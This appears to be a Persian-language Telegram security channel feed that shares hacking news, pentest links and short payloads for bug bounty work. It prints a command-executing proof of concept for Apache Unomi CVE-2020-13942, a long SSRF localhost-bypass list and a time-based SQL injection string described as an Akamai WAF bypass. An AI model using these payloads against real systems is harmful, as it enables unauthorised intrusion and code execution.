امنیت اطلاعات
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
ترکیب سه آسیب پذیری برای تصاحب اکانت

SSRF-->Cloudflare bypass--> Rate limiting to account takeover.


https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304


#writeup
#ssrf



@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
باگ RCE در Apache Unomi

CVE-2020-13942


PoC:
{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}


#apache
#rce

@sec_nerd
یک منبع مناسب برای تهیه wordlist با هدفهای متنوع

https://wordlists.assetnote.io/


#wordlist
#fuzz
#pentest


@sec_nerd
یک رساله دکترا در خصوص تولید اکسپلویت

Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters

https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf


توضیحات مختصر

https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/


#overflow
#exploit


@sec_nerd
استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود

https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38

#php
#poi
#rce

@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰

1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript

https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved

#dev


@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده

https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs


#scan
#enum


@sec_nerd
SSRF Bypass list for localhost (127.0.0.1):

https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net


#ssrf
#bugbounty
#pentest


@sec_nerd
۹ گام برای کرک کردن هش های ntlmv2 که از اسنیف با ابزار وایرشارک بدست آمده اند

https://research.801labs.org/cracking-an-ntlmv2-hash/


#windows
#privesc
#network
#enum


@sec_nerd
ما شیشه ی عطریم، بگوئید به سنگ...
Akamai WAF Bypass & SQLi

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


#pentest
#bugbounty

@sec_nerd
التماس اسراییلی ها به هکرهای شرکت shirbit برای عدم انتشار دیتای هک شده

این هکرها از shirbit مبلغ ۵۰ بیت کوین درخواست کرده اند


#shirbit
#israel
#breach


@sec_nerd